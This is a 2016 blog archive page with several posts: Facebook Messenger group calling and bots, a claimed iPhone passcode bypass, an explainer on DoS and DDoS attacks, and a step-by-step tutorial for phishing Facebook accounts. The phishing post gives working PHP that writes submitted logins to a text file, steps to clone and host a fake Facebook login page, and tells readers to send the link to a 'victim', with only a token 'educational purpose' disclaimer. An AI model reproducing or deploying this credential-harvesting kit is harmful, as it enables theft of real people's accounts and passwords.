Showing posts with label linux. Show all posts
Showing posts with label linux. Show all posts

Friday, 22 April 2016

How To Use Facebook Messenger Group Calling With Up To 50 People


At its F8 developer conference, Mark Zuckerberg explained Facebook’s 10 year roadmap. In the shorter version of Facebook’s roadmap for the next 5 years, Facebook Messenger took a prominent seat. To make Messenger more advanced, the social networking website rolled out Messenger Bots to let the users easily interact with businesses and different services.
Facebook’s Messenger service has about 900 million active users every month and the company is looking for ways to increase this number. To make it a complete communications solution for you, Facebook has now announced the rollout of group calling.

I already use the Messenger Calling feature from time to time but I prefer Skype and Google Hangout due to its group calling facility. Now, with the new addition, Messenger has become a complete Skype and Hangouts competitor.
Facebook began offering voice calling facility in 2013 and it was rolled out for everyone in April 2014. Last year, Facebook CEO Mark Zuckerberg announced that Messenger is making 10% of all the mobile VoIP calls globally.
After ignoring options of making money from Messenger for years, it looks like Facebook is looking to make the service even bigger and popular to make it really profitable when the time comes. In another similar step to push messaging on Facebook, the company started to allow all Facebook users to chat with each other even if they aren’t friends.
Facebook has announced that the update will be rolled out over the next 24 hours. Currently, you can have as much as 50 people in one group call. This big number shows that the social networking website is targeting the business crowd with this new rollout. While you might not need to talk to 50 people simultaneously, it’s worth checking out to chat with your friends and family.

How to use Facebook Messenger Group Calling feature?

If you are wondering how to use Facebook Messenger group calling feature, let me tell you that it’s as simple as group calling on Skype or Hangout.
All you need to do is open any group on Facebook. Look for the Phone icon in the top right and just tap on it. You’ll get a popup prompting you to start a group call and options to choose the group members who can join once the call begins.
After choosing people, you need to hit the Start Call button. At any time, you can see who is in call and who is not.
This voice calling capability in Messenger is rolling out over the next 24 years. If you are not having the feature yet, make sure that you are running the latest version of Facebook Messenger app. I tried Messenger group calling and the call quality was just same as the normal one-to-one Messenger call.
The only feature that’s still missing is the group video calling and we can expect this missing feature to come soon. With that addition, Facebook Messenger could easily serve as an alternative to Skype and Google Hangout as it’ll allow you to make easy conference calls with people whose numbers you don’t have.
Whoever might be the winner in the VoIP race, this could surely mean the end of vintage telephonic voice calling as we know it.

Tuesday, 19 April 2016

How To Use Facebook’s Messenger Bots Right Now?


How To Use Facebook’s Messenger Bots Right Now?

If you are scratching your brains wondering how bots on Facebook look like and how do they operate, calm down. These are simple bots dedicated to a particular service and you can use them right now.
But, at the moment, they are pretty confusing and unintuitive. Many times the bots don’t know what to do and you end up struggling getting any work done.
To make things easier for you, I tried Facebook Messenger Bots myself. I started with Facebook’s very own F8 bot. You can access it via m.me/f8bot. As you visit this URL on your phone, you’ll be asked to choose Messenger or Facebook app to proceed.
I chose Messenger and here are the screenshots of my chat with F8 Messenger Bot.
                              

Next, I decided to try out another Facebook Messenger Bot that was showed off during the F8 keynote. Yes, I’m talking about Poncho, the weather-bot that pretends to be a cat. Chatting to Poncho was better than my F8 bot experience. You can access Poncho via http://m.me/hiponcho.
You can find Poncho and other bots like CNN, WSJ etc. at botlist.co and use them right away.
Here’s how my chat with Poncho turned out:


Friday, 1 April 2016

Unlock iPhone without Passcode(iOS 8 and 9)

Hey guys , UserX keeps posting some cool trick to make your PC or Mobile experience better and better.

So We're back again with another cool trick to unlo iPhone without a passcode (with proof .)

Apple manufactures the iPhone and keep releasing new devices to keep you updated to their technologies and user experience.The more devices they release , their are most of the chances that you will find a new bug in that iOS version.

So in iOS 8 and upto iOS 9.2 there is a bug in iPhone that you can make it fool without unlocking the phone , and finally after four to five steps you will be in Home Screen , and yes you don't enter password.
But , if you think by going to home screen , you can change the password of iPhone, so sorry this is not possible as you require an old password for this thing. This trick is just for fun so enjoy it.



\
The video demonstration of step by step guide to do so is right Here.

Friday, 8 January 2016

What is Phissing? How to hack facebook account


Phissing-hack facebook account with phissing


  1. Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.
  2. How to create phissing page-


  3. 1.Go to the Facebook  ,and then right click on the page, u will see the option "view source" page,click on that.




                                              

    2.Now a new tab will open which contain a source code,Select all the codes and paste it in a notepad.
    3.Now open notepad and find action
    4.You will have to find a text which looks like 

                                           action="https://www.facebook.com/login.php?login_attempt=1"

    5.delete all the text written after action= and instead of it write post.php
                                                     EXAMPLE-"action="post.php"

    6.Now save it on your desktop with the name index.htm,not index.html,remember.


    7.Now your phishing page is ready


                                                       
    8.Now u need php code (it is main part )Open a new notepad and save the given data with the name post.php.

    <?php
    header ('Location:http://www.facebook.com/');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 

    9.You have two files now one is index.htm and another is post.php,remember file extension is important.

    10.Now u have to upload it in any  a web hosting site which supports php script,i prefer u to use www.000webhost.com or www.,my3gb.com.

    11.Here i'm using 000webhost because i have an alredy account in it
                               
    hosting website
                                                  

    12.You have to make a account in that ,after that it looks like a picture given below.


                                                                              
    13.Now go control pannel,then on file manager.

    14.After that a new window will pop up.Now go to public_html.
     

                                               
                                            

    15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                            
    16.Now the last step click on view of index.htm it will look same as facebook page.


                                             

    17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

    18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                    

                                            

    19.Click on view now u will have your friend's password and email id.

                                               
     
    20.This is a simple trick to hack any Facebook password account by phishing page.

    21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
          in to the description of that video u will find a prepared module of phishing pages,download  
          it and enjoy. 

    1. YOU CAN DOWNLOAD FACEBOOK PHISSING FILE NO NEED TO DO ANYTHING JUST DOWNLOAD AND UPLOAD FILE TO 00webhost OR any other webhosting site.

    note: Phissing is illegal activity.Don't

  4. try to anyone.Don't use ur Hacking 

  5. telent to harm any one.

  6. This tutorial is for educational propose

  7.             +Aman Kumar 

What is Denial of Service (DoS) Attack?

What is Denial of Service (DoS) Attack?




Denial of service attack or DoS attack is one of the most common and popular way to exploit and cripple the target (victim) machine. These attacks isolates the victim from its resources like web sites and services by crashing the servers or slowing them down. The DoS attack can be initiated by flooding target machine with so many request at the same time that makes victim’s server crash or unable to respond.
Let’s take an example, suppose you are involved in a group discussion and you have a very important point to share. There’s an another guy John, who doesn’t want you to speak out anyway, so what he can do is engage you with his useless questions and you will continuously answer or argue with him without giving any thought, this will isolate you from rest of the group and other guys won’t be able to communicate with you to conclude the discussion. In above scenario you were the victim and John was the attacker. This scenario is quite similar to the DoS attack.
DoS
Simple DoS
However a simple DoS attacks can be easily prevented by identifying the source of the requestsby its IP and blocking or blacklisting it. By doing this, server (victim) can now identify these blacklisted IPs and can ignore any request generated from it.
DoS attacks can also be carried out by injecting packets and disturbing protocol handlers. Some examples of DoS attacks are
  1. Ping of death: Pinging victim with ridiculously large packets (>65,535 bytes).
  2. Teardrop attack: Fragmented overlapping packets.
  3. LAND attack: LAND stands for Local Area Network Denial, it uses spoofed packets (TCP SYN with senders IP = victim’s IP) to lock the network.
  4. Others: WinNuke / Out-of-band.
This remedy gave birth to a very smart and new kind of DoS attack which is known as DistributedDenial of Service of DDoS attacks which is explained below.
Distributed Denial of Service Attack (DDoS)
In DDoS attacks, attacker needs a amplifying network through which attacker can distributespoofed requests over the network, this makes it impossible for victim to identify the origin of attack because the packets/requests are originating from different source within the network , hence blocking or blacklisting particular IP won’t be able to stop the attack.

DDoS
Typical DDoS attack
Attacker sends control packets to Masters over distributed network and these Masters send similar control packets to zombies /agents which converts this packets into attack packets and sends all the way into the victim server, here masters and zombies/agents are compromised computers running attacker’s code.
The amplifying network mentioned above amplifies the rate and size of packets.
Difference between DoS and DDoS
Let’s consider a rather simple example, suppose you took a vow to take revenge from John (from previous example) who has some webpage hosted over the network. At first you opened victim’s (John’s) web page and start pressing F5 (refresh) continuously by which lots of request is fired to victim’s server making it slow and non-responsive. John however saw this attack (spoofed traffic) and immediately blocked attacker’s (yours) IP address and started ignoring all further request/packets from you.
This was DoS attack and its prevention, but as you also knew the working of DDoS, you called all of your friends and told them to keep refreshing victim’s (John’s) web page. Now John is having hard time to determine which request is spoofed and which is natural, due to which it became impossible for victim to avoid it. This is how simple DDoS attacks are implemented.
Motives of DoS/DDoS attacks
  1. Extortion by threatening victim to launch DoS attack.
  2. For exploiting or training – Some tech junkies perform these attacks because they can, there’s no solid motive or goal behind it. Majority of these attackers are youth mischief who has desire to feel the power to “rule the world”.
  3. Cyber warfare – To avoid information exchange.
  4. Revenge- To take revenge from particular organization. Attackers might attack over little disagreement